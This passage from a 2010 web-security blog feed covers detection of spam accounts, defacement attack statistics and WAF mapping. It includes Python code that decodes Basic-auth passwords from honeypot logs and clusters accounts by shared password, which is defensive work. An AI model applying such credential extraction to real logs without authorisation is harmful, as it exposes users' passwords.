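    return (user, password) if sep else None


def cluster_by_password(log_text: str) -> dict:
    """Group (client_ip, username) pairs by the password they authenticated with."""
    clusters = defaultdict(set)
    for line in log_text.splitlines():
        match = AUTH_RE.search(line)
        if not match:
            continue  # no Basic credentials in this request
        creds = decode_basic(match.group(1))
        if creds is None:
            continue  # malformed token: skip it rather than abort the sweep
        client_ip = line.split(" ", 1)[0]
        user, password = creds
        clusters[password].add((client_ip, user))
    return dict(clusters)


def shared_password_clusters(clusters: dict, min_accounts: int = 3) -> dict:
    """Passwords used by at least min_accounts distinct usernames: the signal that
    one operator controls a batch of accounts, as in the honeypot data above."""
    flagged = {}
    for password, members in clusters.items():
        usernames = {user for _, user in members}
        if len(usernames) >= min_accounts:
            flagged[password] = {"accounts": sorted(usernames),
                                 "client_ips": sorted({ip for ip, _ in members})}
    return flagged


class PasswordPopularity:
    """Registration-time 'hash tracking list': counts how many accounts share a
    password. Passwords are stored only as HMAC-SHA256 digests under a server-side
    pepper, so the table is not a plain unsalted hash list if it ever leaks."""

    def __init__(self, pepper: bytes, max_shared: int = 3, watch_at: int = 2):
        self.pepper = pepper
        self.max_shared = max_shared  # deny once this many accounts already use it
        self.watch_at = watch_at      # place on the fraud watch list at this many
        self.counts = defaultdict(int)

    def _key(self, password: str) -> str:
        return hmac.new(self.pepper, password.encode("utf-8"), hashlib.sha256).hexdigest()

    def register(self, password: str) -> str:
        """Return 'allow', 'watch' or 'deny' for a new account using this password."""
        key = self._key(password)
        already = self.counts[key]
        if already >= self.max_shared:
            return "deny"  # account is not created, so the count does not grow
        self.counts[key] = already + 1
        return "watch" if already + 1 >= self.watch_at else "allow"


if __name__ == "__main__":
    flagged = shared_password_clusters(cluster_by_password(SAMPLE_LOG))
    for password, info in flagged.items():
        print(f"shared password {password!r}: {info}")
    tracker = PasswordPopularity(pepper=b"constructed-pepper")
    for user in flagged.get("rspz318", {}).get("accounts", []):
        print(user, "->", tracker.register("rspz318"))
```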
Since the password isn't one of the typical dictionary ones where it may be possible to have some users actually use the same password, we can only conclude that all of the accounts are controlled by the same person(s).</div><div><br /></div><div><b>Recommendation for web sites</b></div><div>When new accounts are being created, check the new password against some form of hash tracking list to see how many users have that same password. If the password is widely used, then it can either be denied or placed on some form of fraud watch list.</div><div><br /></div><div>If you check out the twitter pages of these fake accounts, you will see that they all have profile pictures of women (even though some of the account names seem male). This may be an attempt to try and disarm readers and entice them to click on the job/tool related links. </div><div><br /></div><div>I checked out one of the links. The first URL shortener resolved to a second URL shortener and then onto the final site - DoNanza</div><div><div></div><blockquote><div>$ wget http://proj.li/d62dIW</div><div>--2010-06-21 14:18:45-- http://proj.li/d62dIW</div><div>Resolving proj.li... 74.55.224.85</div><div>Connecting to proj.li|74.55.224.85|:80... connected.</div><div>HTTP request sent, awaiting response... 301 Moved Permanently</div><div>Location: http://bit.ly/d62dIW [following]</div><div>--2010-06-21 14:18:45-- http://bit.ly/d62dIW</div><div>Resolving bit.ly... 128.121.254.201, 128.121.254.205, 168.143.173.13, ...</div><div>Connecting to bit.ly|128.121.254.201|:80... connected.</div><div>HTTP request sent, awaiting response... 301 Moved</div><div>Location: https://www.donanza.com/publishers?utm_source=twitter&utm_medium=pbl&utm_campaign=cpb#uexox [following]</div><div>--2010-06-21 14:18:45-- https://www.donanza.com/publishers?utm_source=twitter&utm_medium=pbl&utm_campaign=cpb</div><div>Resolving www.donanza.com... 74.55.224.82</div><div>Connecting to www.donanza.com|74.55.224.82|:443... 
connected.</div><div>HTTP request sent, awaiting response... 200 OK</div><div>Length: unspecified [text/html]</div><div>Saving to: `publishers?utm_source=twitter&utm_medium=pbl&utm_campaign=cpb'</div><div><br /></div><div> [ <=> ] 11,236 --.-K/s in 0.1s </div><div><br /></div><div>2010-06-21 14:18:46 (99.4 KB/s) - `publishers?utm_source=twitter&utm_medium=pbl&utm_campaign=cpb' saved [11236]</div></blockquote><div></div></div><div>It seems as though the purpose of these Spam links/accounts is to do some affiliate or click schemes.</div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com3tag:blogger.com,1999:blog-5361523904237597206.post-35618931976590685422010-06-15T16:07:00.006-04:002010-06-15T16:42:02.908-04:00Back to the Future - Economies of Scale Techniques from 2008 Still in Use Today<span style="font-style:italic;">Submitted by Ryan Barnett 6/15/2010</span><br /><br /><div>What is old is new again... While tracking a number of recent stories for the <a href="http://projects.webappsec.org/Web-Hacking-Incident-Database">WASC Web Hacking Incident Database (WHID) Project</a>, I noticed a striking trend - <i><b>many of the current attack trends (<a href="http://tacticalwebappsec.blogspot.com/2008/01/mass-sql-injection-attacks-infect.html">Mass SQL Injection Bot attacks</a>, <a href="http://tacticalwebappsec.blogspot.com/2010/05/botnet-herders-targeting-web-servers.html">Botnet Herding of Web servers for DDoS</a> and targeted attacks against Service/Hosting Providers), we actually first highlighted back in 2008</b></i>. 
</div><div><br /></div><div>Here are a few recent WHID entries for these three issues -</div><div><br /></div><div><span class="Apple-style-span" style=" border-collapse: collapse; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family:'Lucida Grande', Tahoma, Verdana, sans-serif;"><span class="Apple-style-span" style="font-size:medium;"><a href="https://wasc-whid.dabbledb.com/page/wasc-whid/dXhcaNXd?filter33485=&filter33487=2010-115&filter33477=&filter38336=&filter46769=&filter33483=&filter33473=&filter33465=&filter33467=&filter33469=&filter33471=&filter33475=&filter33479=&filter33481=&filter35431=#/////filter33487:MjAxMC0xMTU=//////////">WHID 2010-115: Mass hack plants malware on thousands of webpages</a></span></span></div><div><span class="Apple-style-span" style=" border-collapse: collapse; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family:'Lucida Grande', Tahoma, Verdana, sans-serif;"><span class="Apple-style-span" style="font-size:medium;"><a href="https://wasc-whid.dabbledb.com/page/wasc-whid/dXhcaNXd?filter33485=&filter33487=2010-123&filter33477=&filter38336=&filter46769=&filter33483=&filter33473=&filter33465=&filter33467=&filter33469=&filter33471=&filter33475=&filter33479=&filter33481=&filter35431=#/////filter33487:MjAxMC0xMjM=//////////">WHID 2010-123: Botnet hijacks web servers for DDoS campaign</a></span></span></div><div><span class="Apple-style-span" style=" border-collapse: collapse; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family:'Lucida Grande', Tahoma, Verdana, sans-serif;"><span class="Apple-style-span" style="font-size:medium;"><a href="https://wasc-whid.dabbledb.com/page/wasc-whid/dXhcaNXd?filter33485=&filter33487=&filter33477=&filter38336=&filter46769=&filter33483=&filter33473=&filter33465=&filter33467=&filter33469=&filter33471=&filter33475=&filter33479=&filter33481=&filter35431=#///////////////">WHID 2010-122: Attack of 
WordPress Blogs on Rackspace</a></span></span></div><div><br /></div><div>We highlighted these three specific attack methodologies in the 2008 WHID Report in the "Economies of Scale" section at the end of the following OWASP AppSec WHID presentation given by Ofer Shezaf. Pay particular attention to the last 10 minutes, as all three of these techniques are still relevant today.</div><div><br /><embed id="VideoPlayback" src="http://video.google.com/googleplayer.swf?docid=1130960689238372157&hl=en&fs=true" style="width:400px;height:326px" allowfullscreen="true" allowscriptaccess="always" type="application/x-shockwave-flash"></embed><br /></div><div><br /></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-4571185334530745622010-06-04T10:28:00.006-04:002010-06-04T11:06:28.359-04:00Zone-H Defacement Statistics Report for Q1 2010<em>Submitted by Ryan Barnett 6/4/2010</em>
<br />
<br />Web defacements are a serious problem and are a critical barometer for estimating exploitable vulnerabilities in websites. Unfortunately, most people focus too much on the impact or outcome of these attacks (the defacement) rather than the fact that their web applications are vulnerable to this level of exploitation. People are forgetting the standard Risk equation -
<br /><span style="font-weight: bold; ">RISK = THREAT x VULNERABILITY x IMPACT</span>
<br />
<br />The resulting risk of a web defacement might be low because the impact may not be deemed a high enough severity for a particular organization. What most people are missing, however, is that the threat and vulnerability components of the equation still exist. What happens if the defacers decide not simply to alter some homepage content but instead to do something more damaging, such as adding malicious code to infect clients?
<br />
<br /><span style="font-weight: bold; ">Zone-H Statistics Report for 2008-2009-Q1 2010</span>
<br /><a href="http://www.zone-h.org/">Zone-H</a> is a clearing house that has been tracking web defacements for a number of years. At the end of May 2010, they released <a href="http://www.zone-h.org/news/id/4735">a statistics report which correlated data from 2008, 2009 and the first quarter of 2010</a>. This report revealed some very interesting numbers.
<br />
<br /><span style="font-weight: bold; ">What Attacks Were Being Used?</span>
<br />The first piece of data that interested me was the table listing the various attacks that were successfully employed and that resulted in enough system access to alter the web site content.
<br />
<br /><div><span class="Apple-style-span" style="font-family: verdana; font-size: 14px; "><table bordercolor="#c8c8c8" border="1" align="center"><tbody><tr><td align="center"><span style="font-size: smaller; "> Attack Method</span></td><td><span style="font-size: smaller; "> Total 2008</span></td><td><span style="font-size: smaller; "> Total 2009</span></td><td><span style="font-size: smaller; "><span style="color: rgb(255, 0, 0); "> Total 2010
<br /></span></span></td></tr><tr><td><span style="font-size: smaller; "> Attack against the administrator/user (password stealing/sniffing)</span></td><td><span style="font-size: smaller; "> 33.141</span></td><td><span style="font-size: smaller; "> 24.386</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">10.918</span></span></td></tr><tr><td><span style="font-size: smaller; "> Shares misconfiguration </span></td><td><span style="font-size: smaller; "> 72.192</span></td><td><span style="font-size: smaller; "> 87.313</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">55.725</span></span></td></tr><tr><td><span style="font-size: smaller; "> File Inclusion </span></td><td><span style="font-size: smaller; "> 90.801</span></td><td><span style="font-size: smaller; "> 95.405</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">115.574</span></span></td></tr><tr><td><span style="font-size: smaller; "> SQL Injection </span></td><td><span style="font-size: smaller; "> 32.275</span></td><td><span style="font-size: smaller; "> 57.797</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">33.920</span></span></td></tr><tr><td><span style="font-size: smaller; "> Access credentials through Man In the Middle attack </span></td><td><span style="font-size: smaller; "> 37.526</span></td><td><span style="font-size: smaller; "> 7.385</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.005</span></span></td></tr><tr><td><span style="font-size: smaller; "> Other Web Application bug </span></td><td><span style="font-size: smaller; "> 36.832</span></td><td><span style="font-size: smaller; "> 99.546</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">42.874</span></span></td></tr><tr><td><span style="font-size: smaller; "> FTP Server intrusion </span></td><td><span 
style="font-size: smaller; "> 32.521</span></td><td><span style="font-size: smaller; "> 11.749</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">5.138</span></span></td></tr><tr><td><span style="font-size: smaller; "> Web Server intrusion </span></td><td><span style="font-size: smaller; "> 8.334</span></td><td><span style="font-size: smaller; "> 9.820</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">7.400</span></span></td></tr><tr><td><span style="font-size: smaller; "> DNS attack through cache poisoning </span></td><td><span style="font-size: smaller; "> 7.541</span></td><td><span style="font-size: smaller; "> 3.289</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.361</span></span></td></tr><tr><td><span style="font-size: smaller; "> Other Server intrusion </span></td><td><span style="font-size: smaller; "> 5.655</span></td><td><span style="font-size: smaller; "> 10.799</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">5.123</span></span></td></tr><tr><td><span style="font-size: smaller; "> DNS attack through social engineering </span></td><td><span style="font-size: smaller; "> 6.310</span></td><td><span style="font-size: smaller; "> 2.847</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.358</span></span></td></tr><tr><td><span style="font-size: smaller; "> URL Poisoning </span></td><td><span style="font-size: smaller; "> 5.970</span></td><td><span style="font-size: smaller; "> 6.294</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">3.516</span></span></td></tr><tr><td><span style="font-size: smaller; "> Web Server external module intrusion </span></td><td><span style="font-size: smaller; "> 4.967</span></td><td><span style="font-size: smaller; "> 2.265</span></td><td><span style="font-size: smaller; "> <span style="color: 
rgb(255, 0, 0); ">1.313</span></span></td></tr><tr><td><span style="font-size: smaller; "> Remote administrative panel access through bruteforcing </span></td><td><span style="font-size: smaller; "> 9.991</span></td><td><span style="font-size: smaller; "> 6.862</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">7.046</span></span></td></tr><tr><td><span style="font-size: smaller; "> Rerouting after attacking the Firewall </span></td><td><span style="font-size: smaller; "> 8.143</span></td><td><span style="font-size: smaller; "> 3.107</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.267</span></span></td></tr><tr><td><span style="font-size: smaller; "> SSH Server intrusion </span></td><td><span style="font-size: smaller; "> 6.231</span></td><td><span style="font-size: smaller; "> 4.624</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">4.550</span></span></td></tr><tr><td><span style="font-size: smaller; "> RPC Server intrusion </span></td><td><span style="font-size: smaller; "> 12.359</span></td><td><span style="font-size: smaller; "> 5.821</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">2.512</span></span></td></tr><tr><td><span style="font-size: smaller; "> Rerouting after attacking the Router </span></td><td><span style="font-size: smaller; "> 9.170</span></td><td><span style="font-size: smaller; "> 2.671</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.327</span></span></td></tr><tr><td><span style="font-size: smaller; "> Remote service password guessing</span></td><td><span style="font-size: smaller; "> 6.641</span></td><td><span style="font-size: smaller; "> 3.252</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.103</span></span></td></tr><tr><td><span style="font-size: smaller; "> Telnet Server intrusion 
</span></td><td><span style="font-size: smaller; "> 4.050</span></td><td><span style="font-size: smaller; "> 3.476</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">2.562</span></span></td></tr><tr><td><span style="font-size: smaller; "> Remote administrative panel access through password guessing </span></td><td><span style="font-size: smaller; "> 4.915</span></td><td><span style="font-size: smaller; "> 1.139</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">422</span></span></td></tr><tr><td><span style="font-size: smaller; "> Remote administrative panel access through social engineering </span></td><td><span style="font-size: smaller; "> 4.431</span></td><td><span style="font-size: smaller; "> 1.502</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">472</span></span></td></tr><tr><td><span style="font-size: smaller; "> Remote service password bruteforce </span></td><td><span style="font-size: smaller; "> 5.563</span></td><td><span style="font-size: smaller; "> 3.658</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.002</span></span></td></tr><tr><td><span style="font-size: smaller; "> Mail Server intrusion </span></td><td><span style="font-size: smaller; "> 1.441</span></td><td><span style="font-size: smaller; "> 2.314</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">1.121</span></span></td></tr><tr><td><span style="font-size: smaller; ">Not available</span></td><td><span style="font-size: smaller; "> 70.457</span></td><td><span style="font-size: smaller; "> 87.684</span></td><td><span style="font-size: smaller; "> <span style="color: rgb(255, 0, 0); ">24.493
<br />
<br /></span></span></td></tr></tbody></table></span><div>
<br /><span style="font-weight: bold; ">Lesson Learned #1 - Web Security Goes Beyond Securing the Web Application Itself</span>
<br />The first concept that was reinforced was that the majority of attack vectors had nothing at all to do with the web application itself. The attackers exploited other services that were installed (such as FTP or SSH) or even used DNS cache poisoning, which gives the "illusion" that the real website has been defaced. These defacement statistics should be a wake-up call for organizations to truly embrace defense-in-depth security and re-evaluate their network and host-level security posture.
<br />
<br /><span style="font-weight: bold; ">Lesson Learned #2 - Vulnerability Prevalence Statistics vs. Attack Vectors used in Compromises</span>
<br />There are many community projects and resources available that track web vulnerabilities, such as <a href="http://www.securityfocus.com/archive/1">Bugtraq</a>, <a href="http://cve.mitre.org/">CVE</a> and <a href="http://osvdb.org/">OSVDB</a>. These are tremendously useful tools for gauging the raw number of vulnerabilities that exist in public and commercial web software. Additionally, a project such as the <a href="http://projects.webappsec.org/Web-Application-Security-Statistics">WASC Web Application Security Statistics Project</a> provides further useful data about vulnerabilities that are remotely exploitable in both public and custom code applications. All of this data helps to define both the overall attack surface available to attackers and the Vulnerability component of the RISK equation mentioned earlier. This information shows what <b><i>COULD</i></b> be exploited; for an actual compromise, however, there must also be a threat (attacker) and a desired outcome (such as a website defacement). The data shown in this report should help organizations to prioritize the remediation of these specific attack vectors.
<br />
<br /><span style="font-weight: bold; ">Lesson Learned #3 - Web Defacers Are Migrating To Installing Malicious Code</span>
<br />Another interesting trend is emerging with regards to web defacements - the planting of malicious code. Professional criminal elements of cyberspace (Russian Business Network, etc...) have recruited web defacers into doing "contract" work. Essentially, the web defacers already have access to systems, so they have a service to offer. It used to be that the web site data itself was the only thing of value; now, however, we are seeing that using legitimate websites as a malware hosting platform provides massive scale improvements for infecting users. So, instead of overtly altering website content and proclaiming their 3l33t hax0r ski77z to the world, they are quietly adding malicious javascript code to the sites and making money from criminal organizations and/or malware advertisers by infecting home computer users.</div><div>
<br />Zone-H outlines this concept at the beginning of their report:</div></div><div><span class="Apple-style-span" style="font-family: verdana; font-size: 14px; "><blockquote><i>Worms and viruses like mpack/zeus variants also allow some crackers to gather ftp account credentials, <b>but most of the people using those tools do not deface websites, but prefer to backdoor those sites with iframe exploits in order to hack more and more users, and to steal data from them.</b> </i><a target="_blank" href="http://zone-h.org/archive/notifier=iskorpitx" style="color: rgb(243, 11, 11); "><i>Iskorpitx</i></a><i> for example (but many others do it as well) uses this method to break into hostings, he usually steals credentials with viruses and sometimes even backdoors the defacements for visitors of the defaced sites to be exploited.</i></blockquote></span></div><div>
<br /></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-29371758451605029032010-05-27T11:51:00.011-04:002010-06-18T20:46:37.564-04:00BSIMM2 and WAFs<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_E0YEPhKPc2k/S_6WPW83hrI/AAAAAAAAAIM/_Z4ZOzE-leU/s1600/223fig01_alt.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 174px;" src="http://1.bp.blogspot.com/_E0YEPhKPc2k/S_6WPW83hrI/AAAAAAAAAIM/_Z4ZOzE-leU/s320/223fig01_alt.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5475979387532183218" /></a><br /><b><i>Submitted by Ryan Barnett 05/27/2010</i></b><div><b><i><br /></i></b><br />You may have heard that the <a href="http://bsimm2.com/online/">Build Security In Maturity Model (BSIMM) version 2</a> was <a href="http://www.informit.com/articles/article.aspx?p=1592389">recently released</a>; it documents various software security practices that organizations employ to help prevent application vulnerabilities. OWASP also has a similar project with its <a href="http://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model">Open Software Assurance Maturity model (OpenSAMM)</a>.</div><div><br /></div><div>I was recently asked by a prospect how a Web Application Firewall fits into these security models, and I realized that this wasn't properly documented anywhere. Here are a few direct mappings that I came up with.</div><div><br /></div><div><b>Deployment Phase</b></div><div>The main benefit of a WAF is that it is able to monitor the web application in real-time, in production. 
This addresses some of the limitations of static application assessment tools (SAST) and dynamic application assessment tools (DAST).</div><div><br /></div><div>BSIMM2 lists the following table to describe <a href="http://bsimm2.com/online/deployment/se/">Deployment: Software Environment</a> items:</div><div><br /></div><div><span class="Apple-style-span" style=" line-height: 20px; font-family:Cambria, 'Hoefler Text', Utopia, 'Liberation Serif', 'Nimbus Roman No9 L Regular', Times, 'Times New Roman', serif;font-size:15px;"><table cellspacing="0" cellpadding="0" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(102, 102, 102); border-right-color: rgb(102, 102, 102); border-bottom-color: rgb(102, 102, 102); border-left-color: rgb(102, 102, 102); width: 754px; margin-top: auto; margin-right: auto; margin-bottom: 25px; margin-left: auto; "><tbody><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><th colspan="4" style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">DEPLOYMENT: SOFTWARE ENVIRONMENT<br />OS and platform patching, Web application firewalls, installation and configuration documentation, application monitoring, change management, code signing.</th></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; 
border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); "> </th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Objective</th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Activity</th><th style="background-color: rgb(221, 221, 221); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); ">Level</th></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: 
rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se1.1#se1.1" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">SE1.1</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se1.1#se1.1" style="color: rgb(16, 30, 171); display: block; width: 378px; text-decoration: none; ">watch software</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se1.1#se1.1" style="color: rgb(16, 30, 171); display: block; width: 278px; text-decoration: none; ">use application input monitoring</a></td><td rowspan="2" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; 
border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?l=1#1" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">1</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se1.2#se1.2" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">SE1.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se1.2#se1.2" style="color: rgb(16, 30, 171); display: block; width: 378px; text-decoration: none; ">provide a solid host/network foundation for software</a></td><td 
style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se1.2#se1.2" style="color: rgb(16, 30, 171); display: block; width: 278px; text-decoration: none; ">ensure host/network security basics in place</a></td></tr><tr style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.2#se2.2" style="color: rgb(16, 30, 171); display: block; width: 35px; text-decoration: none; ">SE2.2</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; 
padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.2#se2.2" style="color: rgb(16, 30, 171); display: block; width: 378px; text-decoration: none; ">guide operations on application needs</a></td><td style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?s=se2.2#se2.2" style="color: rgb(16, 30, 171); display: block; width: 278px; text-decoration: none; ">publish installation guides created by SSDL</a></td><td rowspan="3" valign="top" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(170, 170, 170); border-right-color: rgb(170, 170, 170); border-bottom-color: rgb(170, 170, 170); border-left-color: rgb(170, 170, 170); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; "><a href="http://bsimm2.com/online/deployment/se/?l=2#2" style="color: rgb(16, 30, 171); display: block; width: 31px; text-decoration: none; ">2</a></td></tr><tr style="margin-top: 0px; 